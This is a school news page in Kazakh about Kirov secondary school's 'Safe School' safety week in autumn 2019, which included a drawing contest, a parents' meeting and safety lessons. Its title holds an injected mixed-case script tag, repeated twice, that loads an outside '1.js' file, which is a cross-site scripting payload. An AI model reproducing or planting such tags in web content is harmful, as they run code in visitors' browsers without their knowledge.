КММ "Киров орта мектебі " «Қауіпсіз білім ордасы» онкүндігі туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
28.10.2019
«Қауіпсіз білім ордасы» онкүндігін өткізу туралы ақпарат
«Киров орта мектебі» КММ
2019-2020 оқу жылы
16-26 қыркүйек аралығында Киров орта мектебінде «Қауіпсіз білім ордасы» республикалық онкүндігі өтті. Онкүндік аясында келесі іс-шаралар өткізілді:
1-5 сыныптар арасында «Қауіпсіздік кемпірқосағы» тақырыбында сурет байқауы өткізілді, сайысты аға тәлімгер А.Б. Бауыржан өткізді;
Балалардың қауіпсіздігін ұйымдастыру және балаларға қатысты зорлық-зомбылықтың алдын алу бойынша ата-аналар жиналысы өтті;
1-11 сынып оқушылары арасында көшеде, жолда, мектепте, балабақшада, үйде, сондай-ақ бейтаныс адамдармен қауіпсіз жүріс-тұрыс ережелерін түсіндіру мақсатында қауіпсіздік сағаттары өткізілді. Сыныпта оқушыларға қауіпсіздік тәртіп ережелері туралы парақшалар таратылды;
Сонымен қатар, 1-11 сыныптарда балалар үшін қауіпсіздік ережелерін ережелерін түсіндіру мақсатында сынып сағаттары өткізілді.
Просмотров: 648